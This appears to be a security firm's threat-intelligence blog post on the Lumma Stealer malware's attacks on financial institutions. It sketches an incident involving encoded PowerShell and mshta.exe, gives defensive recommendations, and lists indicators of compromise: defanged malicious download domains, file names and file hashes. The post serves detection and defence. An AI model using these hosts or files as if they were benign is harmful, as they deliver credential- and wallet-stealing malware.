August 23, 2024
By PRL

Lumma Stealer: The Silent Predator Targeting Financial Institution

The information stealers ecosystem continues to expand as we witness the ongoing maintenance and new capabilities in the latest stealers versions. Recently, we found a significantincrease in Lumma stealers in our client’s environment carrying out itsstealthy and dangerous moves particularly within the financial sector. This malware is not just another run-of-the-mill threat—it's a sophisticated tool designed to exfiltrate sensitive data with alarming efficiency. As Lumma Stealer continues to evolve, financial institutions are becoming prime targets,and the need for heightened security measures has never been more critical.

The Mission:Lumma Stealer is engineered to steal. It targets login credentials, bank details, and cryptocurrency wallet information, turning compromised devices into goldmines for cybercriminals.

Why Financial InstitutionsAre in the Crosshairs

The financial sector is atreasure trove for attackers, and Lumma Stealer is laser-focused on exploiting it. Recent reports reveal a staggering surge in cyberattacks—over 420,000 injust a few months—many of which are linked to Lumma Stealer. The malware's ability to bypass defenses and zero in on cryptocurrency wallets and two-factor authentication (2FA) systems is particularly concerning, putting both transactions and customer data at severe risk.

Lumma Stealer in Action

Recently, a financial institution faced a significant challenge. The threat began subtly, initiated by a seemingly harmless Power Shell process. However, beneath the surface, encoded commands were being carried out, executing unauthorized and suspicious actions, including obfuscation and potential malicious intent. Furthermore, wenoticed abnormal usage of mshta.exe, a legitimate Windows tool that had been exploited to run external scripts from a suspicious URL, a classic method usedfor delivering malware. An unusual process involving Ashampoo.exe and BitlockerToGo.exewas also identified, indicating unauthorized activity. Fortunately, our robustsecurity tool efficiently detected and neutralized these threats. Instances ofunsigned executables running from temporary directories were also flagged as potential malware activity, prompting swift action. Despite the challenges, our vigilant approach and effective security measures successfully ensured the institution's safety.

Indicators of Compromise(IOCs) to lookout for

Domains from our researchassociated with Lumma stealer

·      https://keto21[.]b-cdn[.]net/town-fil

·      https://microsoftcamp-v1[.]b-cdn.net/micro-v1

·      apzzz-20c7e.kxcdn.com

Files found to beassociated with Lumma Stealer

·      outlook-attachment.exe

·      town-fil

·      micro-v1

·      K[1].zip

·      K[2].zip

·      outlook

·      ashampoo.exe

·      BitLockerToGo.exe

File Hash

·      0581756a656ace2e7d164b1f66846e9d079755bd7a5cead72e73b53ab534531b-micro-v1

·      5f4cf4082dbd503c6f0b652ddd22675f4427a907726e2f8d08c718adeafbb568-town-fil

** Both hashes belong to two different files from different environments pointed to the same file,"BthUdTask.exe."

Limitations

·      Encrypted Powershell Scripts that required adecryptor key

The Fallout: What's atStake

If Lumma Stealer gains afoothold, the consequences can be dire:

·      Data Theft: Critical information—like passwords, credit card numbers, and cookies—can be stolen and sold on the dark web.

·      Financial Loss: Especially for those in the cryptocurrency space, Lumma Stealer can drain wallets and leave users with significant economic losses.

·      Reputational Damage: Abreach could tarnish your institution's reputation, leading to lost trust and potential financial instability.

·      Identity Theft: Stolen personal information can lead to identity theft, compounding the damage.

 

Fighting Back: How toProtect Your Institution

With Lumma Stealer on the rise, here's how to safeguard your financial institution:

·       Implement Threat Intelligence to proactively counter the threats associated with the Lumma Stealer.

·       To protect the endpoints, use robust endpoint security solutions for real-timemonitoring and threat detection.

·       Configure firewalls to block outbound communication to known malicious IP addresses and domains associated with Lumma Stealer command and control servers.

·       Employ application whitelisting to allowonly approved applications to run on endpoints, preventing the execution of unauthorized or malicious executables.

·       Equipyour team with the knowledge to spot phishing attempts and avoid risky online behavior.

·       Havean incident response plan and practice it regularly to ensure a swift, effective response to any security incident.

·       Multi-Factor Authentication: Add layers of security to your transactions with multi-factor authentication, making it harder for attackers to gain access.

     

The Bottom Line

Lumma Stealer is a clearand present danger to financial institutions. As this malware continues toevolve, so must your defenses. Subscribe to threat intelligence to stayvigilant, stay informed on this uprising threat.